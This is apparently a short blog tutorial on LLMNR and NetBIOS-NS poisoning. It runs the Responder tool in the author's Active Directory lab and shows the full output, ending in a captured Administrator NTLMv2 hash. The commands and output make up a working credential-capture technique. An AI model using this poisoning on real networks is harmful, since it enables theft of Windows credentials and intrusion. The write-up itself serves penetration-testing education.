LLMNR and NetBIOS-NS Poisoning

alixan
2 min readOct 17, 2021

--

What is LLMNR and NetBIOS-NS?

NetBIOS:Network Basic Input Output(NetBIOS) is an API that allows computers on the local network to communicate with each other.

NetBIOS-NS: It is a service that NetBIOS uses for name resolution. It can only work over IPv4.

LLMNR:Link-Local Multicast Name Resolution(LLMNR) is DNS-based name resolution protocol of Windows environment that can work over IPv4 and IPv6. It is supported on Windows Vista and later Windows operating systems.

Execution of the Attack

In the attack we will use a tool called Responder : https://github.com/SpiderLabs/Responder

Responder is a tool that provides appropriate responses by listening to requests from the victim machine and imitating various servers.

First we start the responder, it can also be started with just the parameter -I eth0

responder -I eth0 -rdwv
  • rdwv : -rd is the parameters required to respond to different services. -v increases readability.
  • The -w parameter is used in mitm attacks for the wpad protocol

I’m going to make a false request via file share from a machine in the Active Directory Lab.

Since the DNS server of the victim’s machine is not registered in the Domain Controller, it will cause LLMNR broadcast broadcast. No matter what we write, it is enough that it is registered in the Domain Controller.

responder -I eth0 -rdwv
. — — . — — -. — — -. — — -. — — -. — — -. — | |. — — -. — — .
| _| -__|__ — | _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [eth0]
Responder IP [192.168.100.201]
Challenge set [random]
Don’t Respond To Names [‘ISATAP’]
[+] Current Session Variables:
Responder Machine Name [WIN-TUWG92WLJ8N]
Responder Domain Name [2N0L.LOCAL]
Responder DCE-RPC Port [46021]
[+] Listening for events…
[*] [NBT-NS] Poisoned answer sent to 192.168.100.101 for name (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.100.101 for name
[*] [LLMNR] Poisoned answer sent to 192.168.100.101 for name
[SMB] NTLMv2-SSP Client : 192.168.100.101
[SMB] NTLMv2-SSP Username : alixan\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::DCAX1:f2501f1d591a27d6:7C9F19B3358745BFE3D114841A4AFBC4:010100000000000080D276C851A2D7017D14D0D633EBE44D0000000002000800520057005A00450001001E00570049004E002D00310034005A00570034005A0057004600550049005A0004003400570049004E002D00310034005A00570034005A0057004600550049005A002E00520057005A0045002E004C004F00430041004C0003001400520057005A0045002E004C004F00430041004C0005001400520057005A0045002E004C004F00430041004C000700080080D276C851A2D701060004000200000008003000300000000000000000000000003000005A17CDBB632790A8C90056ECE36E70F21B2D68EE70875D078D07ADD10C02B0470A001000000000000000000000000000000000000900140063006900660073002F00730061

As we can see we were able to get the username and the NTLMv2 hash

References:https://www.techtarget.com/searchnetworking/definition/NetBIOS

https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

--

--

No responses yet

Write a response